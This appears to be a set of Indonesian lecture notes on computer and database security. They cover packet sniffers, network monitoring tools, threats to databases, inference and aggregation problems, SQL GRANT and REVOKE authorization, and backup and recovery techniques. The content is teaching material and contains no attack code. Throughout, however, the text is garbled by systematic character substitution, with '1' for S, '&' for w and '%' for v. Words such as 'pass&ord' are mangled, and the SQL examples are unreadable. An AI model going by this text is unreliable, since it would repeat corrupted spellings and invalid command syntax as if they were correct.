1elain program penyerang yang sifatnya agresif melumpuhkan sistem yang dituju, ada juga program penyerang yang sifatnya melakukan pencurian atau penyadapan data. 5ntuk penyadapan data, biasanya dikenal dengan istilah Esniffer(. Meskipun data tidak dicuri secara fisik (dalam artian menjadi hilang), sniffer ini sangat berbahaya karena dia dapat digunakan untuk menyadap pass&ord dan informasi yang sensitif. )ni merupakan serangan terhadap aspek pri%acy. "ontoh program penyadap (sniffer) antara lain' o pcapture (5niK) o sniffit (5niK) o tcpdump (5niK) o :ebP?ay (:indo&s)

PEN22UNAAN (I(TEM PEMANTAU 1ARIN2AN 1istem pemantau jaringan (net&ork monitoring) dapat digunakan untuk mengetahui adanya lubang keamaman. Misalnya apabila anda memiliki sebuah ser%er yang semetinya hanya dapat diakses oleh orang dari dalam, akan tetapi dari pemantau jaringan dapat terlihat bah&a ada yang mencoba mengakses melalui tempat lain. 1elain itu dengan pemantau jaringan dapat juga dilihat usaha!usaha untuk melumpuhkan sistem dengan melalui denial of ser%ice attack (/o1) dengan mengirimkan packet yang jumlahnya berlebihan. ,et&ork monitoring biasanya dilakukan dengan menggunakan protokol 1,MP (1imple ,et&ork Management Protocol). Pro ram netEor# mon!tor!n - mana ement : .therboy (:indo&s), .therman (5niK) 3P Apen%ie& (:indo&s) Packetboy (:indo&s), Packetman (5niK) 1,MP "ollector (:indo&s) :ebboy (:indo&s) Pro ram pemantau jar!n an &an t!da# men una#an (NMP : iplog, icmplog, updlog, yang merupakan bagian dari paket iplog untuk memantau paket )P, )"MP, 5/P. iptraf, sudah termasuk dalam paket +inuK /ebian netdiag net&atch, sudah termasuk dalam paket +inuK /ebian netdiag ntop, memantau jaringan seperti program top yang memantau proses di sistem 5niK trafsho&, menunjukkan traffic antar hosts dalam bentuk teKt!mode KEAMANAN DATA0A(E Pen&eran an Database )nformasi sensitif yang tersimpan di dalam database dapat terbuka (disclosed) bagi orang!orang yang tidak diiCinkan (unauthoriCed ). )nformasi sensitif yang tersimpan di dalam database dapat altered in an unacceptable manner )nformasi sensitif yang tersimpan di dalam database dapat inaccessible bagi orang!orang yang diiCinkan. the underlying operating system may be attacked !! most difficult problem Database In%eren,e Problem Malicious attacker may infer sensiti%e information (that is hidden) from information on a database that is deemed not sensiti%e (made public) More difficult problem' attacker may infer information combining &hat s on the database &ith &hat is already kno&n Database A re at!on Problem Bagian!bagian informasi tidak sensiti%e, dan menjadi sensiti%e ketika digabungkan secara bersamaan. "ontrols for the aggregation problem o 3oney&ell +A"0 /ata Mie&s (+/M) database system ; pieces of data labeled as nonsensiti%e, aggregates labeled as sensiti%e o 1?) 1eaMie& database system ; pieces of data labeled as sensiti%e, aggregates may then be labeled as non sensiti%e Pol&!nstant!at!onG a Control A a!nst D!s,losure -his approach in%ol%es different %ie&s of a database object eKisting for users &ith different security attributes $ddresses the a//re/ation problem by pro%iding different security labels to different aggregates separately $ddresses the inference problem by pro%iding a means for hiding information that may be used to make inferences 3al ' <G

Keamanan Komputer
Database Appl!,at!ons on (e,ure 0ases Most database applications rely on underlying ser%ices of an operating system .Kporting these ser%ices from a -"B &ould enhance the security of the database o database keys implemented using security labels from underlying -"B o -"B keeps audit records of operations on database o A1 file system protection eKtended to database Peran #at #eras 0ebakaran, banjir, bom, pencurian, listrik, gempa, radiasi, kesalahan mekanisme keamanan

1ar!n an Komun!#as! 0abel yang tidak terkoneksi, radiasi Database $turan # amandemen yang tidak diotorisasi, penduplikatan data, pencurian data, kehilangan data akibat gangguan listrik D0M( dan Pro ram Apl!#as! 0esalahan mekanisme keamanan $kses yang terlalu luas Pencurian program 0esalahan program

Pen una A#"!r Menggunakan hak akses orang lain. Melihat D menutup data yang tidak diotorisasi 1taf tidak di!training Pemasukan data yang dilakukan oleh yang tidak berhak. Mirus pemerasan

Pro rammer Operator Membuat Pass&ord. Membuat program yang tidak aman 1taf yang tidak di! training. 0ebijakan keamanan D prosedur Pemogokan staf

Database Adm!n!strator 0ebijakan keamanan D prosedur

Pen&ala" unaan Database : 6. -idak disengaja, jenisnya ' a. kerusakan selama proses transaksi b. anomali yang disebabkan oleh akses database yang konkuren c. anomali yang disebabkan oleh pendistribuasian data pada beberapa komputer d. logika error yang mengancam kemampuan transaksi untuk mempertahankan konsistensi database. ;. /isengaja, jenisnya ' a. Pengambilan data # pembacaan data oleh pihak yang tidak ber&enang. b. Pengubahan data oleh pihak yang tidak ber&enang. c. Penghapusan data oleh pihak yang tidak ber&enang. T!n #atan Pada Keamanan Database : 6. Fisikal lokasi!lokasi dimana terdapat sistem komputer haruslah aman secara fisik terhadap serangan perusak. ;. Manusia &e&enang pemakai harus dilakukan dengan berhati!hati untuk mengurangi kemungkinan adanya manipulasi oleh pemakai yang ber&enang 3al ' <6

Keamanan Komputer
<. =. 1istem Aperasi 0elemahan pada 1A ini memungkinkan pengaksesan data oleh pihak tak ber&enang, karena hampir seluruh jaringan sistem database menggunakan akses jarak jauh. 1istem /atabase Pengaturan hak pemakai yang baik.

ENKRIP(I Remote Cl!ent (er+er D0M( Otor!sas! Dan A#ses

)n!1ecure .ksternal ,et&ork

ENKRIP(I

3IRE;ALL

(e,ure Internal NetEor# 'Intranet9

Lo,al Cl!ent

Database

Keamanan Data : )* Otor!sas! : Pemberian :e&enang atau hak istime&a (pri%iledge) untuk mengakses sistem atau obyek database 0endali otorisasi (Tkontrol akses) dapat dibangun pada perangkat lunak dengan ; fungsi ' Mengendalikan sistem atau obyek yang dapat diakses Mengendalikan bagaimana pengguna menggunakannya 1istem administrasi yang bertanggungja&ab untuk memberikan hak akses dengan membuat account pengguna. 4* Tabel :!eE : Merupakan metode pembatasan bagi pengguna untuk mendapatkan model database yang sesuai dengan kebutuhan perorangan. Metode ini dapat menyembunyikan data yang tidak digunakan atau tidak perlu dilihat oleh pengguna. "ontoh pada /atabase relasional, untuk pengamanan dilakukan beberapa le%el ' 6. ?elasi pengguna diperbolehkan atau tidak diperbolehkan mengakses langsung suatu relasi ;. Mie& pengguna diperbolehkan atau tidak diperbolehkan mengakses data yang terapat pada %ie& <. ?ead $uthoriCation pengguna diperbolehkan membaca data, tetapi tidak dapat memodifikasi. =. )nsert $uthoriCation pengguna diperbolehkan menambah data baru, tetapi tidak dapat memodifikasi data yang sudah ada. 4. 5pdate $uthoriCation pengguna diperbolehkan memodifikasi data, tetapi tidak dapat menghapus data. B. /elete $uthoriCation pengguna diperbolehkan menghapus data. 5ntuk Modifikasi data terdapat otorisasi tambahan ' 6. )ndeK $uthoriCation pengguna diperbolehkan membuat dan menghapus indeK data. ;. ?esource $uthoriCation pengguna diperbolehkan membuat relasi!relasi baru. <. $lteration $uthoriCation pengguna diperbolehkan menambah#menghapus atribut suatu relasi. =. /rop $uthoriCation pengguna diperbolehkan menghapus relasi yang sudah ada. "ontoh perintah menggunakan 1^+ ' 2RANT ' memberikan &e&enang kepada pemakai 1yntaK ' @?$,- Npri%iledge listO A, Nnama relasi#%ie&O -A NpemakaiO "ontoh ' @?$,- 1.+."- A, 1 -A B5/) @?$,- 1.+."-,5P/$-. (1-$-51,0A-$) A, 1 -A $+),B5/) 3al ' <;

Keamanan Komputer
RE:OKE ' mencabut &e&enang yang dimiliki oleh pemakai 1yntaK ' ?.MA0. Npri%iledge listO A, Nnama relasi#%ie&O F?AM NpemakaiO "ontoh ' ?.MA0. 1.+."- A, 1 -A B5/) ?.MA0. 1.+."-,5P/$-. (1-$-51,0A-$) A, 1 -A $+),B5/) Pri%iledge list ' ?.$/, ),1.?-, /?AP, /.+.-., ),.P, $+-.?$-)A,, ?.1A5?". 5* 0a,#up data dan re,o+er& : 0a,#up ' proses secara periodik untuk mebuat duplikat ari database dan melakukan logging file (atau program) ke media penyimpanan eksternal. 1urnal!n ' proses menyimpan dan mengatur log file dari semua perubahan yang dibuat di database untuk proses reco%ery yang efektif jika terjadi kesalahan. Is! 1urnal : ?ecord transaksi 6. )dentifikasi dari record ;. -ipe record jurnal (transaksi start, insert, update, delete, abort, commit) <. )tem data sebelum perubahan (operasi update dan delete) =. )tem data setelah perubahan (operasi insert dan update) 4. )nformasi manajemen jurnal (misal ' pointer sebelum dan record jurnal selanjutnya untuk semua transaksi ?ecord checkpoint ' suatu informasi pada jurnal untuk memulihkan database dari kegagalan, kalau sekedar redo, akan sulit penyimpanan sejauh mana jurnal untuk mencarinya kembali, maka untuk membatasi pencarian menggunakan teknik ini. Re,o+er& : merupakan upaya uantuk mengembalikan basis data ke keadaaan yang dianggap benar setelah terjadinya suatu kegagalan. < *enis Pemulihan ' 6. Pemulihan terhadap kegagalan transaksi ' 0esatuan prosedur alam program yang dapat mengubah # memperbarui data pada sejumlah tabel. ;. Pemulihan terhadap kegagalan media ' Pemulihan karena kegagalan media dengan cara mengambil atau memuat kembali salinan basis data (backup) <. Pemulihan terhadap kegagalan sistem ' 0arena gangguan sistem, hang, listrik terputus alirannya. Fasilitas pemulihan pada /BM1 ' 6. Mekanisme backup secara periodik ;. fasilitas logging dengan membuat track pada tempatnya saat transaksi berlangsung dan pada saat database berubah. <. fasilitas checkpoint, melakukan update database yang terbaru. =. manager pemulihan, memperbolehkan sistem untuk menyimpan ulang database menjadi lebih konsisten setelah terjadinya kesalahan. -eknik Pemulihan ' 6. defered upate # perubahan yang ditunda ' perubahan pada /B tidak akan berlangsung sampai transaksi ada pada poin disetujui ("AMM)-). *ika terjadi kegagalan maka tidak akan terjadi perubahan, tetapi diperlukan operasi redo untuk mencegah akibat dari kegagalan tersebut. ;. )mmediate 5padate # perubahan langsung ' perubahan pada /B akan segera tanpa harus menunggu sebuah transaksi tersebut disetujui. *ika terjadi kegagalan diperlukan operasi 5,/A untuk melihat apakah ada transaksi yang telah disetujui sebelum terjadi kegagalan. <. 1hado& Paging ' menggunakan page bayangan imana paa prosesnya terdiri dari ; tabel yang sama, yang satu menjadi tabel transaksi dan yang lain digunakan sebagai cadangan. 0etika transaksi mulai berlangsung kedua tabel ini sama dan selama berlangsung tabel transaksi yang menyimpan semua perubahan ke database, tabel bayangan akan digunakan jika terjadi kesalahan. 0euntungannya adalah tidak membutuhkan ?./A atau 5,/A, kelemahannya membuat terjadinya fragmentasi. 6* Kesatuan data dan En#r!ps! ' .nkripsi ' keamanan data )ntegritas 'metode pemeriksaan dan %alidasi data (metode integrity constrain), yaitu berisi aturan!aturan atau batasan! batasan untuk tujuan terlaksananya integritas data. 0onkuren ' mekanisme untuk menjamin bah&a transaksi yang konkuren pada database multi user tidak saling menganggu operasinya masing!masing. $danya penjad&alan proses yang akurat (time stamping).

3al ' <<